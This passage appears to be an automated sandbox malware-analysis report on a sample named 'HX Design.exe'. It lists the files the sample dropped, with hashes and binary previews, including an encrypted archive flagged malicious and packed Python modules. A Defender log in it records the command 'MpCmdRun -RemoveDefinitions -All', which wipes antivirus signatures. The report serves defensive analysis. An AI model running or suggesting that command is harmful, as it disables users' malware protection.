File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	894
Entropy (8bit):	3.1176046699489706
Encrypted:	false
SSDEEP:	12:Q58KRBubdpkoPAGdjrNMUNk9+MlWlLehW51IC0MUs:QOaqdmOFdjr+P+kWResLI2V
MD5:	8E5EABAE0706044221B8E2EFD79877AF
SHA1:	3CC851954C4ED650C08A45464B01FD71E2AA8266
SHA-256:	317194181B80B15207C5DFDED4FAD4357694ABAEA0E570AEA227A69BE4DE2050
SHA-512:	CAE2ABEC9C2F843E223C11FE6F058AFECB4395C0E72698DB511EA1595EA98A5108B158363B76B02C3CE07BF19114116C1565B9B8E61D2D01688F491D603CA4D6
Malicious:	false
Reputation:	unknown
Preview:	..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. D.e.c. .. 2.0. .. 2.0.2.4. .2.3.:.5.7.:.1.6.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. F.r.i. .. D.e.c. .. 2.0. .. 2.0.2.4. .2.3.:.5.7.:.1.6.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

C:\Users\user\AppData\Local\Temp\RES6698.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Sat Dec 21 06:31:52 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1372
Entropy (8bit):	4.104623038054434
Encrypted:	false
SSDEEP:	24:HLFq9HhfqaYuUDfH7QwKefN5NII+ycuZhNtsakSMhPNnqS+d:raqcSb/KCN5u1ulqa3OqSe
MD5:	0F43DAD8EE7C5583F5DBA3CE19D9C2B8
SHA1:	2FEDE4D9B7CC18BDD3BBF69390219B5345162645
SHA-256:	D6A871139A377B53A6597D1C57BC0869888E8E045436104621F084AB46EDC21C
SHA-512:	4AAE9BDA9EC6F7C496FAF16C6464A8548C9ACA1B0799CD4A269AEB8EEA4D18FF2A8563374E3EFD13EA735824515AEBBAE3002059717B154174A7521A097583CF
Malicious:	false
Reputation:	unknown
Preview:	L....`fg.............debug$S........x...................@..B.rsrc$01........X.......\...........@..@.rsrc$02........P...f...............@..@........R....c:\Users\user\AppData\Local\Temp\33ajg45c\CSCD665F1311EED4D7D921539AB761843.TMP........................6.j.M.B...........4.......C:\Users\user\AppData\Local\Temp\RES6698.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.3.a.j.g.4.5.c...d.l.l.....(.....L.e.g.a.

C:\Users\user\AppData\Local\Temp\WE9Ml.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\_MEI75082\rar.exe
File Type:	RAR archive data, v5
Category:	dropped
Size (bytes):	676174
Entropy (8bit):	7.999727668689372
Encrypted:	true
SSDEEP:	12288:s5ReQf5MapsV+MdlS5yWQm/A1Ic4P//CV1eXU/KhC2yq+nLhV6TP9NMs2+:GdiYsgMdlSkTSc4/CkhC2KEPzN2+
MD5:	1498F533D25622CF34A275AD96E64432
SHA1:	44A1F4CED9284874E421EE930022538EF4B2DABE
SHA-256:	A506797865D8706C3A79E2F40ED457BCD2ED481E5D8DDE3A43B351F4B82E4F11
SHA-512:	36B1688BAB9EB4F4469E5671958C37FBBFB82F3EA9BFA25A66DDE38D8004C6ECFB329FBF73666E7C55DB7074955499CF0BBE7938754DC3B27F427A2F96BA554C
Malicious:	true
Reputation:	unknown
Preview:	Rar!......w.!.....S..l...1d#..<.r...<r..a.....1.T._MW.u....?#P.h...=.q........cql.6n.Uob.xt......;.%...E..x.\Z........d'?U.....-...hj2`.....X.......@I..>..h.a...Rw.j....d..t....6.F..T.H.fe...q.......g..4..7......m....1EHP....S.....x..c.....6.Q......$.P..b.v.jih...xp=...5'A..ycf.......#..T.M.`e.\|...>Ug.@..v'.?........l.8,..{}'...3..P.m...#C.3!.../...8-.fH.f\).e....&..E.P..Y?.&..n.h..:...f..\|.....6......?....SG.z..I7..5..i..g-..b.m......z..jJ.U. 7...V.o.=.'....ba.....L[.\|...YdGfB6l.Z...E.>.........&............h....9.hq.}k.n..N=..t9..Y...FcF..[.\|.:h..9.U.....7]..$]Ud..P.8.}\|..e..a..(.:...MQ....o.EHZ-bh!..)..vG7F{.U..b>f.......B..a....s.y.n.:.x...<+Ml..T..<y..x{P.....4)'s...@!u.OE4R$..EWm...V.V.BUuAn..`.......e[r.e..F..[`..r.k.k........,RN}3..I...~k..3..~..;.jT......4U........Yj.B..O_..#,.a.W..y...`.$..H..hmv...q=.m..dJ.F6c..)P$...=(.P.(I.u....}<.....v..H.qJ..o.f..:...Hc].3........!.....X.](......6r..w...8]..LS.........Y..._..i).

C:\Users\user\AppData\Local\Temp\_MEI75082\VCRUNTIME140.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	120400
Entropy (8bit):	6.6017475353076716
Encrypted:	false
SSDEEP:	1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
MD5:	862F820C3251E4CA6FC0AC00E4092239
SHA1:	EF96D84B253041B090C243594F90938E9A487A9A
SHA-256:	36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
SHA-512:	2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............\|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\_bz2.pyd

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	49424
Entropy (8bit):	7.815740675307968
Encrypted:	false
SSDEEP:	768:esvzuaVl+ztlrpqKgHrzwTzjT+KyH9qtztKnb3/+u2xmFepwUIJLV1/DU5YiSyvX:huaugLzUz+lOsnb33lUIJLV1i7SyFB
MD5:	58FC4C56F7F400DE210E98CCB8FDC4B2
SHA1:	12CB7EC39F3AF0947000295F4B50CBD6E7436554
SHA-256:	DFC195EBB59DC5E365EFD3853D72897B8838497E15C0977B6EDB1EB347F13150
SHA-512:	AD0C6A9A5CA719D244117984A06CCE8E59ED122855E4595DF242DF18509752429389C3A44A8BA0ABC817D61E37F64638CCBDFFC17238D4C38D2364F0A10E6BC7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!m..!m..!m..(.o.+m..1...#m..1..."m..1...%m..1...)m..1...,m..i..."m..j...#m..!m..\|m..i...)m..i... m..i... m..i... m..Rich!m..........PE..d.....g.........." ...).............d....................................................`.............................................H.................... .. ...................................................p..@...........................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75082\_ctypes.pyd

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	64272
Entropy (8bit):	7.834005148796091
Encrypted:	false
SSDEEP:	1536:Opx/sXWpBktLQ+ndnJZLIDdwXtRg1zk1+3XTkIJyPeB7SyFmhz:OXsXWpBgLBndJSdIgpk1+3XwIJyPeBrm
MD5:	79879C679A12FAC03F472463BB8CEFF7
SHA1:	B530763123BD2C537313E5E41477B0ADC0DF3099
SHA-256:	8D1A21192112E13913CB77708C105034C5F251D64517017975AF8E0C4999EBA3
SHA-512:	CA19DDAEFC9AB7C868DD82008A79EA457ACD71722FEC21C2371D51DCFDB99738E79EFF9B1913A306DBEDACB0540CA84A2EC31DC2267C7B559B6A98B390C5F3A7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h~..............q...............................................q.......q......!u.............................................Rich....................PE..d.....g.........." ...).............J.......................................p............`.........................................Hl.......i.......`.......................l.......................................V..@...........................................UPX0....................................UPX1................................@....rsrc........`......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75082\_decimal.pyd

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	120080
Entropy (8bit):	7.901857200989369
Encrypted:	false
SSDEEP:	3072:DXHhVKXEI3D7AboLmJ2g+3FAZ9raGHT2PIJvqMkPp5:DX3gEcD/Ksg+3JGHC0kb
MD5:	21D27C95493C701DFF0206FF5F03941D
SHA1:	F1F124D4B0E3092D28BA4EA4FE8CF601D5BD8600
SHA-256:	38EC7A3C2F368FFEB94524D7C66250C0D2DAFE58121E93E54B17C114058EA877
SHA-512:	A5FBDA904024CD097A86D6926E0D593B0F7E69E32DF347A49677818C2F4CD7DC83E2BAB7C2507428328248BD2F54B00F7B2A077C8A0AAD2224071F8221CB9457
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j2U..\...\...\..s....\..]...\.._...\..X...\..Y...\...]...\..s]...\...].z.\..._...\...Q...\...\...\.......\...^...\.Rich..\.........................PE..d......g.........." ...).....0...... .....................................................`.....................................................................t+..........\....................................... ...@...........................................UPX0....................................UPX1.............~..................@....rsrc....0.......$..................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75082\_hashlib.pyd

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	36112
Entropy (8bit):	7.6548425105220375
Encrypted:	false
SSDEEP:	768:yzzaDWoin9vvSwNbHyxBpnrIJvIoS5YiSyvE62Em:yzOW6wNbHCrIJvIoQ7Syc6c
MD5:	D6F123C4453230743ADCC06211236BC0
SHA1:	9F9ADE18AC3E12BCC09757A3C4B5EE74CF5E794E
SHA-256:	7A904FA6618157C34E24AAAC33FDF84035215D82C08EEC6983C165A49D785DC9
SHA-512:	F5575D18A51207B4E9DF5BB95277D4D03E3BB950C0E7B6C3DD2288645E26E1DE8EDCF634311C21A6BDC8C3378A71B531F840B8262DB708726D36D15CB6D02441
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W.A.6...6...6...N%..6.......6.......6.......6.......6.......6...N...6.......6...6..26.......6.......6....I..6.......6..Rich.6..........PE..d......g.........." ...).P..........@........................................@............`.........................................\|;..P....9.......0.......................;......................................@+..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........0.......R..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75082\_lzma.pyd

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	88336
Entropy (8bit):	7.9108932581373015
Encrypted:	false
SSDEEP:	1536:wlkdTJ3vEbPVfwGX+zD2z4qVHCy4N491I4lSi5j68Xi4az2yhIJ01uv7SyXN:wUFvEbdfwGOnqpCb491IK/EIJ01uvj
MD5:	055EB9D91C42BB228A72BF5B7B77C0C8
SHA1:	5659B4A819455CF024755A493DB0952E1979A9CF
SHA-256:	DE342275A648207BEF9B9662C9829AF222B160975AD8925CC5612CD0F182414E
SHA-512:	C5CBA050F4B805A299F5D04EC0DCE9B718A16BC335CAC17F23E96519DA0B9EAAF25AE0E9B29EF3DC56603BFE8317CDC1A67EE6464D84A562CF04BEA52C31CFAC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7...V.,.V.,.V.,...,.V.,..-.V.,..-.V.,..-.V.,..-.V.,..-.V.,...-.V.,.V.,.V.,..-.V.,..-.V.,..u,.V.,..-.V.,Rich.V.,................PE..d......g.........." ...). .......p........................................................`.........................................4...L....................0..........................................................@...........................................UPX0.....p..............................UPX1..... ..........................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75082\_queue.pyd

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	27408
Entropy (8bit):	7.449801379195215
Encrypted:	false
SSDEEP:	384:he8SQ/XAVUI1ZCXG5oZa7gJX28IJ9U4NVTHQIYiSy1pCQ5xX1rSJIVE8E9VF0Nyf:he8XPAVhZwvpm8IJ9U4X5YiSyvTo2Et
MD5:	513DCE65C09B3ABC516687F99A6971D8
SHA1:	8F744C6F79A23AA380D9E6289CB4504B0E69FE3B
SHA-256:	D4BE41574C3E17792A25793E6F5BF171BAEEB4255C08CB6A5CD7705A91E896FC
SHA-512:	621F9670541CAC5684892EC92378C46FF5E1A3D065D2E081D27277F1E83D6C60510C46CAB333C6ED0FF81A25A1BDC0046C7001D14B3F885E25019F9CDD550ED0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T...........-.........................................................................A...........Rich...................PE..d.....g.........." ...).0..........@.....................................................`.............................................L.......P............`..l...........<.......................................@...@...........................................UPX0....................................UPX1.....0.......,..................@....rsrc................0..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75082\_socket.pyd

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	45328
Entropy (8bit):	7.729647917060796
Encrypted:	false
SSDEEP:	768:BVO07RbhED2LEIuo4OCYkbaEts+ZIQivK+F8kp9jHIJywFmk5YiSyv+2Eb:zPkD2LEIuo4E5C30d1jHIJywFmu7Sy21
MD5:	14392D71DFE6D6BDC3EBCDBDE3C4049C
SHA1:	622479981E1BBC7DD13C1A852AE6B2B2AEBEA4D7
SHA-256:	A1E39E2386634069070903E2D9C2B51A42CB0D59C20B7BE50EF95C89C268DEB2
SHA-512:	0F6359F0ADC99EFAD5A9833F2148B066B2C4BAF564BA16090E04E2B4E3A380D6AFF4C9E7AEAA2BA247F020F7BD97635FCDFE4E3B11A31C9C6EA64A4142333424
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............ll}.ll}.ll}...}.ll}..m\|.ll}..o\|.ll}..h\|.ll}..i\|.ll}..m\|.ll}.lm}.ll}..m\|.ll}..a\|.ll}..l\|.ll}..}.ll}..n\|.ll}Rich.ll}........PE..d.....g.........." ...).p...........q....................................................`.........................................D...P....................0.......................................................}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75082\_sqlite3.pyd

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	60176
Entropy (8bit):	7.847943448203495
Encrypted:	false
SSDEEP:	1536:HqbxjT8JFLTgRG/dv8xxEOKI+C6IJvQl67SydP:KbFT8JZg+8xBd+XIJvQl6L
MD5:	8CD40257514A16060D5D882788855B55
SHA1:	1FD1ED3E84869897A1FAD9770FAF1058AB17CCB9
SHA-256:	7D53DF36EE9DA2DF36C2676CFAEA84EE87E7E2A15AD8123F6ABB48717C3BC891
SHA-512:	A700C3CE95CE1B3FD65A9F335C7C778643B2F7140920FE7EBF5D9BE1089BA04D6C298BF28427CA774FBF412D7F9B77F45708A8A0729437F136232E72D6231C34
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........V...7.7.7.Oc..7...7.....7...7.....7.....7...7..O.7.7.6.....7...7.....7...7.Rich.7.........................PE..d......g.........." ...)............p-.......................................P............`..........................................K..P....I.......@.......................K......................................p9..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75082\_ssl.pyd

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	68368
Entropy (8bit):	7.86108869046165
Encrypted:	false
SSDEEP:	1536:knDFWlIqOuazwp1eBNcnYTpXZwWVfTwIJL7O497Sy5ArQ:+5MtOu89KYTXwEEIJL7OKjAQ
MD5:	7EF27CD65635DFBA6076771B46C1B99F
SHA1:	14CB35CE2898ED4E871703E3B882A057242C5D05
SHA-256:	6EF0EF892DC9AD68874E2743AF7985590BB071E8AFE3BBF8E716F3F4B10F19B4
SHA-512:	AC64A19D610448BADFD784A55F3129D138E3B697CF2163D5EA5910D06A86D0EA48727485D97EDBA3C395407E2CCF8868E45DD6D69533405B606E5D9B41BAADC0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......FM.^.,k..,k..,k..T...,k...j..,k...h..,k...o..,k...n..,k.J.j..,k...j..,k..,j..-k.ITj..,k.J.f..,k.J.k..,k.J....,k.J.i..,k.Rich.,k.................PE..d......g.........." ...).........P.......`...................................@............`.........................................l<..d....9.......0.......................<.......................................(..@...........................................UPX0.....P..............................UPX1.........`......................@....rsrc........0......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-console-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	21944
Entropy (8bit):	4.7084462212093365
Encrypted:	false
SSDEEP:	192:xtLcOTWthWhWEXCVWQ4iWTKIjwX01k9z3A24hab2iNr:x5cgWthW+9HR9zp4hab2ur
MD5:	9313C86E7BAE859F0174A1C8B6ABA58B
SHA1:	DCE67FD1DA5DA8DC4BA406C544E55A83D6536CC9
SHA-256:	AF9675AC90BAE8A0D8623F6FDAFF9D39E1B8810E8E46A5B044BAAA3396E745B3
SHA-512:	2EC64FCE4A86BC52DC6C485FD94D203020617DF92698CA91AE25C4901984899E21C7DD92881EC52D6850EDFA547701AAB9B0CD1B8D076E6779B1A13324CDD3A4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...GM.t.........." ...&.....0...............................................@.......m....`A........................................p...,............0...............0...%..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-datetime-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22080
Entropy (8bit):	4.592452831045455
Encrypted:	false
SSDEEP:	192:xoWthWyWEXCVWQ4WWGwBj9BtaFFX01k9z3AufJzkKhH:xoWthWl49WR9z3fJn
MD5:	854458AD55C39A9DFD1E350A51BE02B8
SHA1:	5013CF58DE5A0B55E026ACE967E9842B3B131C2A
SHA-256:	F918B0C45F59B2CB29F1EB3653D2F2679095E85E082A1198C933A76EDF1F33EF
SHA-512:	FAA41A5031033F7E86EFEBC47777F915E95617F4B05D93833066C206D9C092855D8072C7BD142898F5A2BD1F94B646D98933302DDEB5A9CA0D5930C7B2241B98
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...f............." ...&.....0...............................................@....... ....`A........................................p................0...............0..@&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-debug-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22080
Entropy (8bit):	4.601301180304749
Encrypted:	false
SSDEEP:	192:xPWthWKWEXCVWQ4iWUhUVgiZTOebR5X01k9z3ACRsU2Owl:xPWthWdY9bt5R9zxRscI
MD5:	7AD2034ACD0F296FE9EED320E5AD7591
SHA1:	FE1B217E3F4567905968F7A3D48A7611E3CF3F7B
SHA-256:	0D859A866D1BCEFE1A1BC5ADB88DCF2765567ECC31DFB4E472B512D033D88BB4
SHA-512:	06D017B0EF9D081BC627F7F33D51EF2FE64E2CC5023204771032C4ED7BF26C0C6106B69D78F7BDD880FA59E8E4048B2DA8848784BC92D7780155DF140C952420
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d.....Z..........." ...&.....0...............................................@............`A........................................p................0...............0..@&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-errorhandling-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22096
Entropy (8bit):	4.647021056323618
Encrypted:	false
SSDEEP:	192:xZXmxD3TsWthWEJWJWadJCsVWQ4fGWozCCJgiZTOebR5X01k9z3ACRsvA/hN:xZX0sWthWEoCs+8B9bt5R9zxRsM
MD5:	12EA48CE605EBB204A21AE7D86DB3417
SHA1:	5FB0FF9BA4105CD76EE4470AE4CAD0A39AE68C66
SHA-256:	189BBBD739526A986E53518865E741CDE8C5967AACD5ED687408CEC3D8781F1C
SHA-512:	39B486FB72C9DFF4E391673A872E957DBF0545D4D26914D0B0A475624E40B4FEEC3A9A17549E87BA806B1A90BF6F7784A187C506DAA1DB5201561CEF90FF6E81
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d....?............" ...&.....0...............................................@............`A........................................p................0...............0..P&..............p............................................................................rdata..H...........................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-fibers-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22096
Entropy (8bit):	4.583973444067797
Encrypted:	false
SSDEEP:	192:x9WthWaWJWadJCsVWQ46WecDtagQ5X01k9z3An/wynnXfO:x9WthWXCs3cDtdQ5R9zY/wynXfO
MD5:	201FF3CD2FFE7D222F46574D4AC40A70
SHA1:	B43F19BBB8FD1C8AA05BA67DEA38A7785DBE57B6
SHA-256:	B83A71978215FDBA477C4EA61340168947A1021324D118E6B7159054985F2D1A
SHA-512:	3F99D7B501C1DB470A6D91AF856EBBEDE05522ACB5763D928F4FB28C74DB2339B46DF108745ED8EBD8C6C1298D9495358C245D188F055638B0D6DD568FA596D2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...D............." ...&.....0...............................................@.......3....`A........................................p................0...............0..P&..............p............................................................................rdata..`...........................@..@.data........ ......................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-file-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26040
Entropy (8bit):	4.8520631205553
Encrypted:	false
SSDEEP:	192:xRwhDPvVr8rFTsvWthWsWEXCVWQ4iW73KIjwX01k9z3A24haCIa6PAWw1:xaJPvVrhWthWXFHR9zp4hasB
MD5:	4B328F140A3AE7FEDB21CA50CC23D938
SHA1:	9E71B4C2CF030A644D2050188C4B77E638C0EE14
SHA-256:	E55B200643E8B078E7F5EB0C97DE44FEAD21B11D06590EBEDBCB84214D063345
SHA-512:	4C349F45CA4DB4F1247AA405E5627F22B7CCFE66234D8D970475E71471EBB251F7A0F781A33D0E4EC893F86653B0A1C8508ADF576E923D0CE86B43F552204614
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......=$..yEw.yEw.yEw.....xEw...w.xEw...s.{Ew....xEw...u.xEw.RichyEw.........PE..d...d..u.........." ...&.....@...............................................P......#=....`A........................................p...x............@...............@...%..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI75082\api-ms-win-core-file-l1-2-0.dll

Download File

Process:	C:\Users\user\Desktop\HX Design.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22056
Entropy (8bit):	4.608645300170232
Encrypted:	false
SSDEEP:	192:xPIkMRmKjoRWthWaWEXCVWQ4KWiGfpfKUSIX01k9z3ABw8FcT:xgKRWthWNLWF2IR9zT8FcT
MD5:	4A060EEC454C222A5381CD359DC00B81
SHA1:	21E1BC115D04A74779E955EA16A16BD71454D9BB
SHA-256:	E6B2B05E14A6C6F5381E8F4C7F4FD28A499246FB4C8EAFE1F08014B9273D70DF
SHA-512:	16FB1F4CCDAD05D07FEB62E0CD078401F4023F9FAB0FB15E52B927CA413E65EB32C2932BA59DBFA7F7EE0E8A8053748E27F2757E82E600DB812271AA44A9433C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
